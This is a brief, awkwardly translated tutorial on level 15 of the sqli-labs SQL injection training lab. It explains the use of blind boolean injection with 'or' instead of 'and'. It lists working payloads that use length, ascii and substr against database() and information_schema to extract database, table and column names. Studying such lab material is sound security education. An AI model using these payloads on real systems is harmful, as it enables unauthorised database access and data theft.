About sqli lab less-15 using or instead of and parsing

Follow the old train of thought , Try the means of reporting errors , It is found that no error statement is output , View source code , It is found that there is no output statement （ So consider using blind injection ）

（ With 15 For example ）

• Determine the database length ：’or (length(database()))=8-- q

• Judge the database name ：'or (ascii(substr(database(),1,1)))=115-- q

• The name of the judgment table ：'or (ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)))=101-- q

• Determine the name of the column :'or (ascii(substr((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘emails’ limit 0,1),1,1)))=105-- q

We found that in the previous eight and nine levels, we used and; And by the 15 Turn off , We use or , Let's look at the following two levels of source code （ Take questions 9 and 15 as examples ）

Now let's put these two statements together ：

It's not hard to see. , If we were 15 Question use and Then it will become ：

Obviously not , Because we don't know username Value . If you use or, Then the following values are established as a whole .

And in the 9 In question id=1 Is established, so it can be used and As a connection of statements .